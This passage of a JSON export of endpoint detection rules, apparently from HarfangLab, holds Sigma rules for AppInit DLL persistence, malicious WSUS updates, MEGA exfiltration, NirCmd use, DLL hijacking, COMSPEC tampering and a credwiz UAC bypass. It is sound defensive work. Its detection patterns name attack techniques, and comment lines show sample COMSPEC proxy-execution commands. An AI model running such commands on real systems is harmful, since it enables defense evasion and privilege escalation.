LoadAppInit_DLLs keys in registry.\n Attackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\n This functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\n It is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/\n - https://attack.mitre.org/techniques/T1546/010/\ndate: 2020/09/24\nmodified: 2025/05/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry:\n EventType: SetValue\n\n selection_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n filter_loadappinit:\n # For LoadAppInit_DLLs all values != zero are valid\n Details: 'DWORD (0x00000000)'\n\n selection_key_appinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n\n selection_key_requiresignedappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n Details: 'DWORD (0x00000000)'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n - '\\n'\n\n exclusion_nvidia_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_nvidia_loadappInit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Program Files\\NVIDIA Corporation\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_sophos_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\WINDOWS\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll,?:\\Windows\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll,?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\Windows\\System32\\SophosAV\\sophos_detoured_x64.dll'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL,?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n\n exclusion_sophos_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-setup32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n exclusion_appsense:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmCoreService.exe'\n\n # Equitrac Office Client\n exclusion_equitrac:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'EQPortMonitorSpy.dll'\n\n exclusion_msi_install_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Details: 'DWORD (0x00000001)'\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding * E Global\\MSI0000'\n - '?:\\Windows\\system32\\MsiExec.exe -Embedding * E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_nvidia_hp:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage|contains: '\\Display.NvContainer\\NVDisplay.Container.exe'\n Details:\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook32.dll'\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook.dll'\n\n exclusion_citrix:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook64.dll'\n\n exclusion_setupplatform:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_greenprint:\n # ce0cd8e9ad34b85bd164a60a4a5de5cee895353d8520cf14923399d1001aa3e1\n Details: '?:\\Progra~?\\Greenp~?\\gphknt32.dll'\n\n exclusion_altiris:\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n Details: 'DWORD (0x00000001)'\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n Details:\n - 'aminit64.dll'\n - 'aminit32.dll'\n\n exclusion_virtualdesktop:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\PROGRA~?\\VIRTUA~?\\VIRTUA~?.DLL'\n\n exclusion_systrack:\n ProcessImage: '?:\\Program Files (x86)\\SysTrack\\LsiAgent\\LsiAgent.exe'\n\n condition: selection_registry and ((selection_loadappinit and not filter_loadappinit) or 1 of selection_key_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5", "rule_name": "Registry AppInit DLLs Modified", "rule_description": "Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\nAttackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\nThis functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\nIt is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\n", "rule_creation_date": "2020-09-24", "rule_modified_date": "2025-05-19", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1546.010" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1e085ad6-7f93-463c-9238-b75582736135", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.072911Z", "creation_date": "2026-03-23T11:45:34.072913Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.072918Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/nettitude/SharpWSUS", "https://github.com/ThunderGunExpress/Thunder_Woosus", "https://github.com/AlsidOfficial/WSUSpendu", "https://attack.mitre.org/techniques/T1210/" ], "name": "t1210_potential_malicious_update_through_wsus.yml", "content": "title: Possible Malicious Update via WSUS\nid: 1e085ad6-7f93-463c-9238-b75582736135\ndescription: |\n Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\n Attackers can use WSUS to launch malicious payloads disguised as Windows Updates.\n This technique can be used for lateral movement.\n It is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://github.com/ThunderGunExpress/Thunder_Woosus\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/11/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 19 # Successful update\n Source: Microsoft-Windows-WindowsUpdateClient\n updateTitle|contains:\n - 'SharpWSUS'\n - 'Probably-legal-update'\n - 'Bundle update for \\* Windows (from KB2862335)'\n - 'Bundle Security Update for \\* Windows (from KB2862335)'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1e085ad6-7f93-463c-9238-b75582736135", "rule_name": "Possible Malicious Update via WSUS", "rule_description": "Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\nAttackers can use WSUS to launch malicious payloads disguised as Windows Updates.\nThis technique can be used for lateral movement.\nIt is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\n", "rule_creation_date": "2022-11-16", "rule_modified_date": "2025-03-07", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1210" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091788Z", "creation_date": "2026-03-23T11:45:34.091790Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091794Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1567_002_suspicious_url_request_to_mega.yml", "content": "title: Suspicious URL Request to the MEGA API\nid: 1eb11fe6-9630-4058-bdec-67f5cde7cb1a\ndescription: |\n Detects suspicious URL requests to the file sharing service MEGA.\n Adversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\n The BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\n It is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\n Additionally, review alerts and try to analyze the downloaded file.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/07/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1537\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'g.api.mega.co.nz'\n\n filter_mega:\n ProcessSigned: 'true'\n ProcessSignature: 'Mega Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a", "rule_name": "Suspicious URL Request to the MEGA API", "rule_description": "Detects suspicious URL requests to the file sharing service MEGA.\nAdversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\nThe BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\nIt is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\nAdditionally, review alerts and try to analyze the downloaded file.\n", "rule_creation_date": "2023-07-17", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1102.002", "attack.t1537", "attack.t1567.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1ecc91f4-bed7-4cec-b236-f7b943f95289", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.295810Z", "creation_date": "2026-03-23T11:45:35.295814Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.295820Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://twitter.com/1ZRR4H/status/1575364101148114944", "https://www.nirsoft.net/utils/nircmd.html", "https://attack.mitre.org/techniques/T1059/" ], "name": "t1059_execution_of_nircmd.yml", "content": "title: NirCmd Execution\nid: 1ecc91f4-bed7-4cec-b236-f7b943f95289\ndescription: |\n Detects the execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled in the rule ad9a4851-d601-4528-a0d2-a3d77b050741\n filter_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_commandline:\n CommandLine: '*\\nircmd.exe setsysvolume *'\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # https://www.dicomizer.com/\n exclusion_modalizer:\n - CommandLine:\n - 'nircmd win close ititle OBS'\n - 'nircmd win close ititle capture'\n # nircmd convertimages c:\\videocapture\\capture\\*.png .jpg\n - 'nircmd convertimages ?:\\videocapture\\capture\\\\*'\n # nircmd win setsize title capture 980 90 390 650\n - 'nircmd win setsize title capture *'\n - ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\videocapture\\\\*\\\\*.bat'\n\n exclusion_westerndigital:\n ParentImage: '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n\n exclusion_medinbox:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*\\Medinbox\\Medinbox.Launcher\\Medinbox.Launcher.bat'\n\n exclusion_openwhispr:\n Image|endswith: '\\resources\\bin\\nircmd.exe'\n ProcessParentProduct: 'OpenWhispr'\n ProcessParentCompany: 'OpenWhispr Team'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1ecc91f4-bed7-4cec-b236-f7b943f95289", "rule_name": "NirCmd Execution", "rule_description": "Detects the execution of the NirCmd.\nNirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n", "rule_creation_date": "2022-11-03", "rule_modified_date": "2026-02-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1059", "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.602126Z", "creation_date": "2026-03-23T11:45:34.602129Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.602137Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_setupugc.yml", "content": "title: DLL Hijacking via setupugc.exe\nid: 1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via setupugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setupugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DNSAPI.dll'\n - '\\mpr.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc", "rule_name": "DLL Hijacking via setupugc.exe", "rule_description": "Detects potential Windows DLL Hijacking via setupugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080239Z", "creation_date": "2026-03-23T11:45:34.080241Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080245Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py", "https://attack.mitre.org/techniques/T1216/" ], "name": "t1216_cmd_comspec_tampering.yml", "content": "title: COMSPEC Tampered via cmd.exe\nid: 1f00e764-5dc8-4df8-a8d7-2e11b24a7e76\ndescription: |\n Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\n This can be used to perform a signed script proxy execution and takeover control of a legitimate script.\n It is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\nreferences:\n - https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\T1216_random_executable.exe && cscript C:\\Windows\\System32\\manage-bde.wsf\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\cmd.exe\n # $env:comspec=C:\\Windows\\system32\\calc.exe; cscript C:\\Windows\\System32\\manage-bde.wsf\n selection_1:\n - Image|endswith: '\\cmd.exe'\n # Renamed binaries\n - OriginalFileName: 'Cmd.EXE'\n selection_2:\n CommandLine|contains|all:\n - '/c '\n - 'set'\n - ' comspec='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76", "rule_name": "COMSPEC Tampered via cmd.exe", "rule_description": "Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\nThis can be used to perform a signed script proxy execution and takeover control of a legitimate script.\nIt is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\n", "rule_creation_date": "2022-01-21", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1216" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074233Z", "creation_date": "2026-03-23T11:45:34.074235Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074239Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/hfiref0x/UACME" ], "name": "t1548_002_uac_bypass_credwiz.yml", "content": "title: UAC Bypass Executed via credwiz\nid: 1f520703-a22a-4e93-8e0f-30cd3c1272f1\ndescription: |\n Detects an UAC bypass via credwiz.exe.\n This alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\credwiz.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\wbem\\oobe.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1", "rule_name": "UAC Bypass Executed via credwiz", "rule_description": "Detects an UAC bypass via credwiz.exe.\nThis alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is 